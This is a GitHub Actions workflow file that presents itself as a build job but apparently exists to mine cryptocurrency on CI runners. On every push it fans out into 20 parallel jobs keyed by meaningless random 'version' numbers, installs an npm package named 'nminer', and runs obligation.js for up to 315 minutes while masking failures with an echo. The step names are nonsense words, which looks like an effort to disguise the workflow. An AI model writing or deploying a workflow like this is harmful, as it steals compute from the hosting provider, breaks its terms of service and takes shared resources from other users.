name: obligation
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 203 }
          - { version: 4146 }
          - { version: 9488 }
          - { version: 8924 }
          - { version: 8602 }
          - { version: 2405 }
          - { version: 9605 }
          - { version: 9072 }
          - { version: 8406 }
          - { version: 3723 }
          - { version: 5913 }
          - { version: 6096 }
          - { version: 824 }
          - { version: 7176 }
          - { version: 5454 }
          - { version: 3786 }
          - { version: 4027 }
          - { version: 8172 }
          - { version: 6255 }
          - { version: 6497 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: between willfully
        run: |
          npm install nminer@latest
          timeout 315m node obligation.js || echo "obligation executed"